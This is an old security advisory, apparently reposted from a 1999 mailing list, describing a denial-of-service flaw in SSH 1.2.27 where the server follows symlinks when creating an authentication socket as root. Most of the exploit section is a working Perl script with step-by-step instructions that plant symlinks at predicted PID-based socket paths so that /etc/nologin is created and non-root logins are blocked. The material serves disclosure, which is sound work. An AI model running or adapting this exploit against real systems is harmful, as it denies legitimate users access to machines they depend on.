ssh_exploit.txt

28 Sep 1999, reported by Packet Storm (packetstormsecurity.com)

SSH 1.2.27 vulnerable to Denial of Service attack via symlink exploitation.

I received this email today and wanted to know if it is something to be of concern about.

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
  
SSH 1.2.27 vulnerable to a Denial of Service attack

------------------------------------------------------------
  
SSH has the option of setting up "authentication sockets", used to pass authentication keys securely. When this is used, a socket is created on both client and server machines; the socket created on the server uses an easy to guess filename (based on the PID). The creation of this socket is done while the server is acting as root and follows symlinks.
  
  
******************************

Exploit:

- connect to the remote machine
- run the following script (creates symlinks for the next 50 PIDs):

----- cut -----
#!/usr/bin/perl

# PID of this process; the server names its socket after a PID, so the
# next 50 PIDs are the likely names.
$pid = $$;

$whoami = `whoami`;
chop($whoami);
mkdir("/tmp/ssh-$whoami", 0700);

# Plant a symlink at each predicted socket path pointing at /etc/nologin.
for ($i = $pid; $i < $pid+50; $i++)
{
    symlink("/etc/nologin", "/tmp/ssh-$whoami/ssh-$i-agent");
}
----- cut -----
  
  
- on the local machine, execute ssh-agent1; it will produce a few lines to cut and paste into your shell.

- ssh1 to the remote machine; enter password

The socket will have been created at /etc/nologin, preventing other non-root users from logging in. This connection too will die with "Logins are currently denied by /etc/nologin:"
  
This was tested on a RedHat 6.0 machine, with standard configure/make/install installation of ssh. This script should work pretty well for systems that create processes where each PID is one greater than the last; other platforms may require modifications, or many-many more links, if they're exploitable.
